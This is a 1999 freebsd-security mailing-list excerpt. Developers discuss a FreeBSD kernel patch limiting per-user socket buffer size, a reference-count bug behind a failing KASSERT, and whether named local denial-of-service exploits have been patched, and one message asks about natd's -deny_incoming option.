"Any sufficiently advanced bug is \ Hmmm. I see a problem, but it may not be the cause of your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be sufficient to determine when a uip can be deleted, because a root process can change it's uid (resulting in the old uip's proccnt possibly going to 0) and a socket buffer can be set to 0-length during a shutdown() operation, possibly causing ui_sbsize to go to zero. Thus both fields may end up zero, a reference to the uip may remain associated with the socket, and chgproccnt may free the underlying uip. I think what you need is a direct pointer reference to the uip from the socket. This would require a ui_refcount be kept on the uip, since ui_proccnt isn't really a general ref count in of itself. I suspect that you may still hit the KASSERT, that there is something we are still missing, but this should help. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 18:12: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from c004.sfo.cp.net (c004-h005.c004.sfo.cp.net [209.228.14.76]) by hub.freebsd.org (Postfix) with SMTP id 9940D157B9 for ; Sat, 4 Sep 1999 18:11:59 -0700 (PDT) (envelope-from mistrM@socal.rr.com) Received: (cpmta 7503 invoked from network); 4 Sep 1999 18:11:32 -0700 Received: from 216-32-43-154.irv0.flashcom.net (HELO M2) (216.32.43.154) by smtp.flashcom.net with SMTP; 4 Sep 1999 18:11:32 -0700 X-Sent: 5 Sep 1999 01:11:32 GMT From: Mr.M Reply-To: mistrM@socal.rr.com To: freebsd-security@freebsd.org Subject: Re: Local DoS in FreeBSD Date: Sat, 4 Sep 1999 18:05:55 -0700 X-Mailer: KMail [version 1.0.21] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <99090418140301.23808@M2> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Please excuse me. With all the bugs, exploits, and vulnerabilities in the various programs and OSes I run I've gotten a little confused. The vulnerability you are discussing in this threat is called testsockbuf.c? Which was reported on Aug. 9th. If so, I must have missed it. My question is what about the Multiple Vendor Shared Memory Denial of Service Attack (vm-dos.c) that was posted on bugtraq on July 15? This supposedly effected all the BSDs and Linux. Has this been verified and patched? Any information on this would be greatly appreciated. Please correct me if anything I have posted is incorrect. TIA, Mario Paz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 18:20:48 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id 262F315668; Sat, 4 Sep 1999 18:20:45 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id SAA63930; Sat, 4 Sep 1999 18:20:37 -0700 (PDT) (envelope-from dillon) Date: Sat, 4 Sep 1999 18:20:37 -0700 (PDT) From: Matthew Dillon Message-Id: <199909050120.SAA63930@apollo.backplane.com> To: "Brian F. Feldman" , Garrett Wollman , Nick Hibma , FreeBSD -- The Power to Serve , Mike Tancsa , freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD References: <199909050110.SAA63819@apollo.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ::Whatever's in login.conf? :) Would you mind helping me out with ::http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails ::in some cases, which I need help tracking down. ::... :: Brian Fundakowski Feldman / "Any sufficiently advanced bug is \ : : Hmmm. I see a problem, but it may not be the cause of : your problem. 'ui_proccnt == 0 && ui_sbsize == 0' may not be : sufficient to determine when a uip can be deleted, because a root : process can change it's uid (resulting in the old uip's proccnt : possibly going to 0) and a socket buffer can be set to 0-length : during a shutdown() operation, possibly causing ui_sbsize to go to : zero. : : Thus both fields may end up zero, a reference to the uip : may remain associated with the socket, and chgproccnt may : free the underlying uip. : : I think what you need is a direct pointer reference to : the uip from the socket. This would require a ui_refcount : be kept on the uip, since ui_proccnt isn't really a : general ref count in of itself. : : I suspect that you may still hit the KASSERT, that there : is something we are still missing, but this should help. Oh wait, I don't know which KASSERT() you were refering to. If you were refering to the first one (uip != NULL), I think it can occur as I say. If it is refering to the second one, (uip->ui_sbsize >= 0), then I'm not sure. Either way I would get rid of chgsbsize() and instead change the chgproccnt() function to take a third argument, or make it even more general by passing a field type and a delta to allow it to be scaled to other things. It may be as simple as the KASSERT winding up being wrong. I would also instrument the panic portion of the KASSERT to display more information, such as value of 'diff' and the old value of ui_sbsize when uip is not NULL. That may make the problem more obvious. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 20:13: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 2FBB11500A; Sat, 4 Sep 1999 20:12:57 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id XAA26309; Sat, 4 Sep 1999 23:12:40 -0400 (EDT) (envelope-from wollman) Date: Sat, 4 Sep 1999 23:12:40 -0400 (EDT) From: Garrett Wollman Message-Id: <199909050312.XAA26309@khavrinen.lcs.mit.edu> To: "Brian F. Feldman" Cc: freebsd-security@FreeBSD.org Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: References: <199909012046.QAA07324@khavrinen.lcs.mit.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: >> [I wrote:] >> What's not clear is: >> >> 1) At what level do you impose this limit? > Resource limit, definitely. You totally missed the point. >> 2) Should the limit be statistical or exact? > Well, I have it exact it would seem. So you clearly haven't actually thought about what the right answer is. >> 3) What is a sensible default value? > Whatever's in login.conf? Not at all helpful. > http://www.FreeBSD.org/~green/sbsize2.patch? The KASSERT() fails > in some cases, which I need help tracking down. I think if you're not going to implement the Right Thing, there's no sense adding all that complexity -- just make a per-socket limit, and require the sysadmin to tune his kernel to match the resource limits established. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Sep 4 23:47:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from pro.icp.ac.ru (pro.icp.ac.ru [193.233.43.46]) by hub.freebsd.org (Postfix) with ESMTP id 5A2C215355 for ; Sat, 4 Sep 1999 23:47:41 -0700 (PDT) (envelope-from ratebor@cityline.ru) Received: from vedi.pc.icp.ac.ru (vedi.pc.icp.ac.ru [192.168.253.19]) by pro.icp.ac.ru (8.9.3/8.8.7) with ESMTP id KAA85451 for ; Sun, 5 Sep 1999 10:47:35 +0400 (MSD) (envelope-from ratebor@cityline.ru) Date: Sun, 5 Sep 1999 10:44:06 +0400 From: "Dmitriy V. Bokiy" X-Mailer: The Bat! (v1.34a) UNREG / CD5BF9353B3B7091 Reply-To: "Dmitriy V. Bokiy" X-Priority: 3 (Normal) Message-ID: <1447.990905@cityline.ru> To: freebsd-security@FreeBSD.ORG Subject: newbie: natd Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org From natd(8): "-deny_incoming | -d Reject packets destined for the current IP number that have no entry in the internal translation table." My question is what packets are affected by this option? Packets with public addresses(I mean this scheme:Internet-->router(ipfw+NAT)-->subnet1(public addresses)-> ->router(ipfw)-->subnet2(reserved addresses))? --Dmitriy P.S. Sorry, if it`s dull question. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message